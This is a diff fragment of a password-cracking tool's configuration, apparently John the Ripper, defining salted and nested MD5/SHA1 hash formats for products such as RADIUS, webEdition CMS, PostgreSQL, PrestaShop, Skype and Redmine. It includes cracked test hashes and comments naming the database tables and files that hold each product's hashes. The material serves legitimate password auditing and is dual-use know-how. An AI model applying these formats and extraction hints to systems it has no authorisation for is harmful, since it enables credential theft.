+# later we will get dynamic working with these also.
+#Test=$dynamic_1008$7fe3c4d1bf2ac68e94ee9f2bf75b9601$HEX$00000000000000000000000000000000:secret
+#Test=$dynamic_1008$658bbf9f04538d6bede09a4a52a77504$HEX$626c6168003637383930313233343536:secret
+TestM=$dynamic_1008$6bf84723242c758538951ebfcbe82498$Zm8EXfUeRrEJMx5b:123456789012345678901234567890123456789
+TestF=$dynamic_1008$7978620b9b48b1d6e322bfe5b081bf3e$yH9RErqH2ktDYesl:1234567890123456789012345678901234567890123456789012345678901234
+
+######################################################################
+# Dynamic Type for algorithm used in RADIUS Responses md5($s.$p)
+#
+# Also used by a "popular" backup solution
+# select id, name, emailid, password from administrator;
+# hashlib.md5((str(id) + pwd)).hexdigest()
+######################################################################
+[List.Generic:dynamic_1009]
+Expression=md5($s.$p) (RADIUS Responses)
+Flag=MGF_SALTED
+Saltlen=-16
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1009$0b9b9fdf75fc79d85c5b69aa1de26288$Salt:test1
+Test=$dynamic_1009$05ed3fc5e044d559290c400254e568c9$1:hackme
+TestM=$dynamic_1009$9619094908f5c9f29eb95eadefae84c3$ex5fKtjhZwVMCi2C:123456789012345678901234567890123456789
+TestF=$dynamic_1009$92cfbd6aadc48b2ef97ca2699037dea6$73WkPYCT2CxnQ8pt:1234567890123456789012345678901234567890123456789012345678901234
+
+######################################################################
+# Dynamic Type for algorithm used in RAdmin v2.x Responses md5($p.NULL-to-100-bytes)
+# v2, where keys are in input, and set_input_len_100 'cleans' up if needed.
+######################################################################
+[List.Generic:dynamic_1010]
+Expression=md5($p null_padded_to_len_100) RAdmin v2.x MD5
+##JF Flag=MGF_NOTSSE2Safe
+##JF Flag=MGF_KEYS_INPUT
+##JF Func=DynamicFunc__set_input_len_100
+##JF Func=DynamicFunc__crypt_md5
+
+# MUCH faster.  Went from 1930k to 5600k
+MaxInputLen=99
+MaxInputLenX86=99
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_INPUT
+Flag=MGF_POOR_OMP
+Func=DynamicFunc__set_input_len_100
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+
+Test=$dynamic_1010$B137F09CF92F465CABCA06AB1B283C1F:lastwolf
+Test=$dynamic_1010$14e897b1a9354f875df51047bb1a0765:podebradka
+Test=$dynamic_1010$02ba5e187e2589be6f80da0046aa7e3c:12345678
+Test=$dynamic_1010$b4e13c7149ebde51e510959f30319ac7:firebaLL
+Test=$dynamic_1010$3d2c8cae4621edf8abb081408569482b:yamaha12345
+Test=$dynamic_1010$60cb8e411b02c10ecc3c98e29e830de8:xplicit
+
+####################################################################
+# DYNAMIC type for webEdition CMS md5($p.md5($s))
+# > select username,passwd,UseSalt from tblUser
+# username is salt
+####################################################################
+[List.Generic:dynamic_1011]
+Expression=md5($p.md5($s)) (webEdition CMS)
+Flag=MGF_SALTED
+MaxInputLenX86=48
+SaltLen=-55
+MaxInputLen=23
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input2
+Func=DynamicFunc__append_keys2
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1011$e82bf09e8a1899d4c3d00a3f380d5cdb$SXB:openwall
+Test=$dynamic_1011$c0e024d9200b5705bc4804722636378a$admin:admin
+Test=$dynamic_1011$14f8b3781f19a3b7ea520311482ce207$openwall:openwall
+TestM=$dynamic_1011$b8db62204359efcbfc92da2d697d21cb$xkcR9B:12345678901234567890123
+TestF=$dynamic_1011$61f55f04f8f4e05392415181bcf57420$rtJEIj:123456789012345678901234567890123456789012345678
+
+####################################################################
+# DYNAMIC type for webEdition CMS md5($p.md5($s))
+# > select username,passwd,UseSalt from tblUser
+# username is salt
+# Twice as fast as dynamic_1011 since md5($s) is pre-computed!
+####################################################################
+[List.Generic:dynamic_1012]
+Expression=md5($p.md5($s)) (webEdition CMS)
+Flag=MGF_SALTED
+Flag=MGF_SALT_AS_HEX
+MaxInputLenX86=48
+SaltLen=-110
+MaxInputLen=23
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1012$e82bf09e8a1899d4c3d00a3f380d5cdb$SXB:openwall
+Test=$dynamic_1012$c0e024d9200b5705bc4804722636378a$admin:admin
+Test=$dynamic_1012$14f8b3781f19a3b7ea520311482ce207$openwall:openwall
+TestM=$dynamic_1012$b8db62204359efcbfc92da2d697d21cb$xkcR9B:12345678901234567890123
+TestF=$dynamic_1012$61f55f04f8f4e05392415181bcf57420$rtJEIj:123456789012345678901234567890123456789012345678
+
+####################################################################
+## DYNAMIC type for webEdition CMS md5($p.PMD5(username))
+## > select md5(username),passwd,UseSalt from tblUser
+## PMD5(username), pre-computed md5 of username is salt
+#####################################################################
+[List.Generic:dynamic_1013]
+Expression=md5($p.PMD5(username)) (webEdition CMS)
+Flag=MGF_SALTED
+MaxInputLenX86=48
+MaxInputLen=23
+SaltLen=32
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1013$14f8b3781f19a3b7ea520311482ce207$f2df0ddd3129c68b1ae7be05779ebeb3:openwall
+TestM=$dynamic_1013$b8db62204359efcbfc92da2d697d21cb$f3ae4d2b2c3600df57bbeab163eac04b:12345678901234567890123
+TestF=$dynamic_1013$61f55f04f8f4e05392415181bcf57420$5e87dbf3663cbead467fc645c5c9586d:123456789012345678901234567890123456789012345678
+
+####################################################################
+# Dynamic type for md5($p.$s) for long salts
+####################################################################
+[List.Generic:dynamic_1014]
+# expression shown will be this string:
+Expression=md5($p.$s) (long salt)
+# Flag needed here, is Salt
+Flag=MGF_SALTED
+##JF Went from 1376k/1100k to 3483k/2600k by switching to flat buffer sse2
+##JF Flag=MGF_NOTSSE2Safe
+Flag=MGF_FLAT_BUFFERS
+##JF Flag=MGF_FULL_CLEAN_REQUIRED
+##JF MaxInputLen=32
+MaxInputLenX86=110
+MaxInputLen=110
+SaltLen=-137
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+##JF Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_1014$c0dbfba522fad4054da9808a2fa09580$aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa:test
+Test=$dynamic_1014$6130b0e84d387ffd460fc83cffcc1426$bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbc:aaaa
+Test=$dynamic_1014$399df23011bb3742e83011c1074187e2$cccccccccccccccccccccccccccccccccccccccccccccccccccd:bbbb
+Test=$dynamic_1014$b962b0d40fc9111ce5f8efab424bad73$NormalSaltNormal:secret
+Test=$dynamic_1014$8bfccd9d67ec0bcdc38e9ae3c19a2903$FinishingwitHEX$:secret
+Test=$dynamic_1014$bf239357f3aa95508a53fe41b7e5f2e3$inthem$HEXiddle6:secret
+Test=$dynamic_1014$e463b65f14643afd970c7ea7e7efeb0f$123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890:12345678901234567890123456789012
+
+####################################################################
+# Dynamic type for md5(md5($p.$u).$s) for PostgreSQL 'pass the hash' weakness
+# See also dynamic_1034 for PostgreSQL MD5
+# http://www.openwall.com/lists/oss-security/2015/03/03/12
+####################################################################
+[List.Generic:dynamic_1015]
+Expression=md5(md5($p.$u).$s) (PostgreSQL 'pass the hash')
+Flag=MGF_SALTED
+Flag=MGF_USERNAME
+MaxInputLen=31
+MaxInputLenX86=56
+SaltLen=-23
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input2
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1015$1d586cc8d137e5f1733f234d224393e8$HEX$f063f05d:openwall:postgres
+Test=$dynamic_1015$1c4e11fb51835c3bbe9851ec91ec1375$HEX$c31803a2:password:postgres
+Test=$dynamic_1015$bf2a64f35feba7bf1b633d60393c1356$HEX$684697c8:openwall:postgres
+# repeat one test in the format that is used in john.pot
+Test=$dynamic_1015$1d586cc8d137e5f1733f234d224393e8$HEX$f063f05d242455706f737467726573:openwall
+TestM=$dynamic_1015$c99b3494687ed9895d4ffca184a9daf5$M6krNt:1234567890123456789012345678901:usrx
+TestF=$dynamic_1015$5618a66e934dfef13cae2d06d71bdf75$usrwxT:12345678901234567890123456789012345678901234567890123456:01234
+
+####################################################################
+# Dynamic type for md5($p.$s) for long salts
+#  NOTE, we should use dynamic_2001 and not this hash.
+####################################################################
+[List.Generic:dynamic_1016]
+# expression shown will be this string:
+Expression=md5($p.$s) (long salt)
+# Flag needed here, is Salt
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=110
+MaxInputLen=110
+SaltLen=-137
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+Test=$dynamic_1016$08e3ded271f83affc8f127dae3cb5bed$HEX$e30003fa000100000001000000000000000000000000000000000000000000000000000000000000d7dd1060ee06bec2:secret
+# repeat that hash in exactly the same form that is used in john.pot
+#Test=$dynamic_1016$08e3ded271f83affc8f127dae3cb5bed$HEX$48455824653330303033666130303031303030303030303130303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303030303064376464313036306565303662656332:secret
+
+####################################################################
+# Dynamic type for md5($s.$p) for long salts
+#  NOTE, we should use dynamic_2004 and not this hash.
+####################################################################
+[List.Generic:dynamic_1017]
+# expression shown will be this string:
+Expression=md5($s.$p) (long salt)
+# Flag needed here, is Salt
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+MaxInputLenX86=55
+MaxInputLen=55
+SaltLen=-192
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__MD5_crypt_input1_to_output1_FINAL
+# PrestaShop uses long salts, $s == _COOKIE_KEY_ (config/settings.inc.php file)
+# PrestaShop hashes can be extracted from the "ps_employee" table ("ps_" is the default table prefix)
+# PrestaShop 1.6.0.9 was used for testing this!
+# Update: PrestaShop 1.7.x.y doesn't make use of the config/settings.inc.php
+# file. It uses bcrypt hashing, and the hashes are stored in the ps_customer
+# table.
+#
+# This hash format is also used by RADIUS Responses when salts are > 16 bytes long.
+Test=$dynamic_1017$2b3f4811983db00560dfd4c28f67bc5a$B3DdR7ZVi2N26aVbR84bjSAHht8JYhqcDr1FK49jiQXFU8Vo66PKmAFt:lemons12345
+
+[List.Generic:dynamic_1018]
+Expression=md5(sha1(sha1($p)))
+Flag=MGF_StartInX86Mode
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__SHA1_crypt_input1_append_input2
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1018$a93dcf04edd0e2b98c1165304c250b80:1234abcd
+Test=$dynamic_1018$f3b5f01810c4d66ae0af85b3789e12cd:potato
+TestM=$dynamic_1018$5c43d21a3dfb81435d45e78334fa6109:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1018$073c8ec8e73fdedb7aad9df4ded29ba3:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1019]
+Expression=md5(sha1(sha1(md5($p))))
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__SSEtoX86_switch_output1
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1019$86f607194f0aefe63a6c13723e94382d:jjaammaaiiccaa
+Test=$dynamic_1019$77faf9282c0c9b5870a4d9c3ec484aca:blink182
+TestM=$dynamic_1019$bc679e2715c335fcf8b9205efd031521:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1019$36966d66615d3c0de89ca53ed88212ec:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1020]
+Expression=md5(sha1(md5($p)))
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__SSEtoX86_switch_output1
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1020$2a8ce40b837c8550506d9b5d220bac28:0124
+TestM=$dynamic_1020$74102b324b8b1cf909263284a53955aa:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1020$e4ad9c1e34bad775d2cd399294c286e8:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1021]
+Expression=md5(sha1(md5(sha1($p))))
+Flag=MGF_StartInX86Mode
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__SHA1_crypt_input1_append_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__SSEtoX86_switch_output2
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1021$c1e054140feac1b411d3efc8bae5b881:norway
+TestM=$dynamic_1021$dbf8fc7a96898e16e1251d94b3bb06d9:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1021$df38670077cb4c299bcaf06e8271c986:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1022]
+Expression=md5(sha1(md5(sha1(md5($p)))))
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__SSEtoX86_switch_output1
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__SSEtoX86_switch_output2
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__X86toSSE_switch_input2
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1022$9caf8c249c588a89030db581ec6cea47:313131
+Test=$dynamic_1022$e1eb34c6ab9e9cbe4ff67fdeb747e169:8616
+TestM=$dynamic_1022$d4d51c756abefb41bafbcff7c6237618:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1022$9367b878de004be863000174e728c15f:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1023]
+Expression=sha1($p) (hash truncated to length 32)
+Flag=MGF_KEYS_INPUT
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_POOR_OMP
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1023$5baa61e4c9b93f3f0682250b6cf8331b:password
+Test=$dynamic_1023$e4227954acdafb57977d7dc8a1957095:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1024]
+Expression=sha1(md5($p)) (hash truncated to length 32)
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__SSEtoX86_switch_output1
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1024$c56289182ffd862d906eac1ce5c6fe6d:trigun
+TestM=$dynamic_1024$e290c79e9584e4cd61faded848ff96f0:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1024$609fed73c093edfbcc9913004656f360:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1025]
+Expression=sha1(md5(md5($p))) (hash truncated to length 32)
+Flag=MGF_KEYS_INPUT
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output_to_input2_as_base16
+Func=DynamicFunc__crypt2_md5
+Func=DynamicFunc__SSEtoX86_switch_output2
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_from_last_output2_as_base16
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1025$f122db007ed655921f98184e4302bba8:123456
+TestM=$dynamic_1025$006d246968ee9e761578bce26d5a82a2:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1025$cc98637054045e998ab01e97ce65585e:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1026]
+Expression=sha1(sha1($p)) (hash truncated to length 32)
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_INPUT
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__SHA1_crypt_input1_overwrite_input2
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1026$71b37a2d9b0a7d5dc4da8a08d9092817:peanuts
+Test=$dynamic_1026$30f8cf133eaac8e3b6af4bcba722921d:peanut
+Test=$dynamic_1026$809df50e02b68a389a8f6639a03421eb:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1027]
+Expression=sha1(sha1(sha1($p))) (hash truncated to length 32)
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_INPUT
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__SHA1_crypt_input1_overwrite_input2
+Func=DynamicFunc__SHA1_crypt_input2_overwrite_input2
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1027$b8443c12b3066dac22b3857b2fb779b4:leelee
+Test=$dynamic_1027$00aeb6dc5e6269a6b2f39728cd8a6812:test1
+Test=$dynamic_1027$54e45916fb79f7be1c695828fdba4491:test3
+Test=$dynamic_1027$d08a9796dc4ea6decf59ce43caa1b4b4:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1028]
+Expression=sha1(sha1_raw($p)) (hash truncated to length 32)
+# currently, the raw sha1 does not work in SSE code.  It does work on 'flat' x86 code
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_INPUT
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input2
+Func=DynamicFunc__LargeHash_OUTMode_raw
+Func=DynamicFunc__SHA1_crypt_input1_append_input2
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1028$79239e0207cd5f6a472c8795c73b451d:rainbow
+Test=$dynamic_1028$06c0bf5b64ece2f648b5f048a7190390:test1
+Test=$dynamic_1028$f357e78cabad76fd3f1018ef85d78499:test3
+Test=$dynamic_1028$64ad70ca481a2c33a2c843cc03555365:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1029]
+Expression=sha256($p) (hash truncated to length 32)
+Flag=MGF_FLAT_BUFFERS
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA256_crypt_input1_to_output1_FINAL
+Test=$dynamic_1029$e4ad93ca07acb8d908a3aa41e920ea4f:iloveyou
+Test=$dynamic_1029$13b1f7ec5beaefc781e43a3b344371cd:freedom
+Test=$dynamic_1029$aa97302150fce811425cd84537028a5a:computer
+Test=$dynamic_1029$75ff6bea5b0ad25171988e435c24b3ee:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1030]
+Expression=whirlpool($p) (hash truncated to length 32)
+Flag=MGF_FLAT_BUFFERS
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__WHIRLPOOL_crypt_input1_to_output1_FINAL
+Test=$dynamic_1030$56fd4ecb153a08b65a73b51e3c8ca369:spiral
+Test=$dynamic_1030$6b116ef0c32185d3ae1136f4593a5cae:defender
+Test=$dynamic_1030$fee8605795f28dda386324d59a28ba99:amazon
+Test=$dynamic_1030$73622582350099f45647970c0a8a2496:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1031]
+Expression=gost($p) (hash truncated to length 32)
+Flag=MGF_FLAT_BUFFERS
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__GOST_crypt_input1_to_output1_FINAL
+Test=$dynamic_1031$0e8cd409a23c2e7ad1c5b22b101dfa16:admin
+Test=$dynamic_1031$3b024be97641061bdd5409b4866c26c5:test1
+Test=$dynamic_1031$55719211936152fbe2e1f6aa796fa866:test3
+Test=$dynamic_1031$096dd6ff632727d682070752fbda548e:12345678901234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1032]
+Expression=sha1_64(utf16($p)) (PeopleSoft)
+Flag=MGF_INPBASE64m
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_UTF8
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__setmode_unicode
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+Test=$dynamic_1032$6Pl/upEE0epQR5SObftn+s2fW3M=:password
+
+[List.Generic:dynamic_1033]
+Expression=sha1_64(utf16($p).$s)
+Flag=MGF_INPBASE64m
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_SALTED
+Flag=MGF_UTF8
+SaltLen=-32
+MaxInputLen=110
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__setmode_unicode
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__setmode_normal
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+# we want to make SURE that something ending with = mixed
+# with others NOT ending with = are handled properly.
+Test=$dynamic_1033$D7C1gHanUq1xE96HpEQitzAhNB8$FyKXs6zU:password
+Test=$dynamic_1033$sh+Q50Cp4vERzDkJcaaKIv8zubM=$M1RxMCTZ:password2
+Test=$dynamic_1033$DfM7ryjrNamyG0wRS6CwheZS6Mo$3swBL4qn:
+
+####################################################################
+# Dynamic type for md5($p.$u) for PostgreSQL stored MD5 hashes
+# See also dynamic_1015 for PostgreSQL 'pass the hash' (with salt)
+####################################################################
+[List.Generic:dynamic_1034]
+Expression=md5($p.$u) (PostgreSQL MD5)
+Flag=MGF_USERNAME
+SaltLen=-32
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1034$bd6fd49a627ecdbe4031b2d52d5748ab:openwall:postgres
+Test=$dynamic_1034$32e12f215ba27cb750c9e093ce4b5127:password:postgres
+
+[List.Generic:dynamic_1300]
+MaxInputLen=55
+MaxInputLenX86=110
+Flag=MGF_POOR_OMP
+Expression=md5(md5_raw($p))
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_keys
+# changed these 3 lines to the 4 lines that follow. This format has had problems
+# in certain builds (like generic). Likely it is the set_input_len_16 causing
+# issues and should be looked at. For now, the new method using input2 works fine.
+#Func=DynamicFunc__crypt_md5_to_input_raw
+#Func=DynamicFunc__set_input_len_16
+#Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append2_from_last_output1_as_raw
+Func=DynamicFunc__crypt_md5_in2_to_out1
+Test=$dynamic_1300$43442676c74ae59f219c2d87fd6bad52:admin
+Test=$dynamic_1300$5cbaca32e76bb49ca69657a9145d77ee:test1
+Test=$dynamic_1300$1c8b12da6f307bbfe8d245c79d468b3d:test3
+TestM=$dynamic_1300$60f3fd93d4e949d871dc7713664b2b4e:1234567890123456789012345678901234567890123456789012345
+TestF=$dynamic_1300$d66e6e66ff4a8dc6f3665740268fe1bc:12345678901234567890123456789012345678901234567890123456789012345678901234567890
+
+[List.Generic:dynamic_1350]
+Expression=md5(md5($s.$p):$s)
+# Flag needed here, is Salt.
+CONST1=:
+Flag=MGF_SALTED
+SaltLen=2
+MaxInputLen=53
+MaxInputLenX86=108
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__crypt_md5
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_from_last_output_as_base16
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_salt
+Func=DynamicFunc__crypt_md5
+Test=$dynamic_1350$c1f58952ab714b5ef76926628f6e0b16$92:blondie
+Test=$dynamic_1350$a130dbe6709653d602eec70945e14f87$9e:blondie
+TestM=$dynamic_1350$0f7dcf84c95a3c191a4bff15c62058a0$12:12345678901234567890123456789012345678901234567890123
+TestF=$dynamic_1350$f78bdbc1c68b64f52c40d777068309fb$12:123456789012345678901234567890123456789012345678901234567890123456789012345678
+
+# Thanks to JimF for his help in making this format work
+# (Jean-Michel Picod)
+[List.Generic:dynamic_1400]
+Expression=sha1(utf16($p)) (Microsoft CREDHIST)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_StartInX86Mode
+Flag=MGF_POOR_OMP
+Flag=MGF_UTF8
+MaxInputLen=55
+MaxInputLenX86=110
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__setmode_unicode
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__SHA1_crypt_input1_to_output1_FINAL
+#Test=$dynamic_1500$e8f97fba9104d1ea5047948e6dfb67fa:password
+Test=$dynamic_1400$e8f97fba9104d1ea5047948e6dfb67facd9f5b73:password
+
+# Thanks JimF for his help making this format to work
+# (Jean-Michel Picod)
+[List.Generic:dynamic_1401]
+Expression=md5($u.\nskyper\n.$p) (Skype MD5)
+Flag=MGF_USERNAME
+Flag=MGF_StartInX86Mode
+Flag=MGF_INPUT_20_BYTE
+CONST1=\x0Askyper\x0A
+# 23 gives us ability to do user names up to 55-8-23 (or 24 byte user names)
+# this should be ported to a flat format.
+MaxInputLen=23
+MaxInputLenX86=110
+SaltLen=-24
+Func=DynamicFunc__clean_input
+Func=DynamicFunc__append_userid
+Func=DynamicFunc__append_input1_from_CONST1
+Func=DynamicFunc__append_keys
+Func=DynamicFunc__crypt
+# NOTE, I did not have full 40 byte hashes, but am using the INPUT_20_BYTE flag.
+# The last 8 0's are only used for valid to work, and so we can add full hashes
+# when we get them. Only the first 16 bytes is used in hash compare within JtR
+Test=$dynamic_1401$27f6a9d892475e6ce0391de8d2d893f700000000:password:username
+Test=$dynamic_1401$27f6a9d892475e6ce0391de8d2d893f700000000$$Uusername:password
+# repeat that hash in exactly the same form that is used in john.pot
+Test=$dynamic_1401$27f6a9d892475e6ce0391de8d2d893f700000000$HEX$2455757365726e616d65:password
+
+# In Redmine, the hashed password is stored in the following form,
+# SHA1(salt + SHA1(password))
+#
+# $ mysql -u root -p
+# mysql> use bitnami_redmine;
+# Database changed
+# mysql> select * from users
+[List.Generic:dynamic_1501]
+Expression=sha1($s.sha1($p)) (Redmine)
+Flag=MGF_INPUT_20_BYTE
+Flag=MGF_SALTED
+Flag=MGF_FLAT_BUFFERS
+Flag=MGF_KEYS_BASE16_IN1_SHA1
+SaltLen=32
+MaxInputLenX86=110
+MaxInputLen=110
+Func=DynamicFunc__clean_input2_kwik
+Func=DynamicFunc__append_salt2
+Func=DynamicFunc__append_input2_from_input
+Func=DynamicFunc__SHA1_crypt_input2_to_output1_FINAL
+Test=$dynamic_1501$dd49e260795cb71da6904b9bccec30cb79b189f5$21737e0ab18ae77caec21f73c6e60c8d:redminecrap
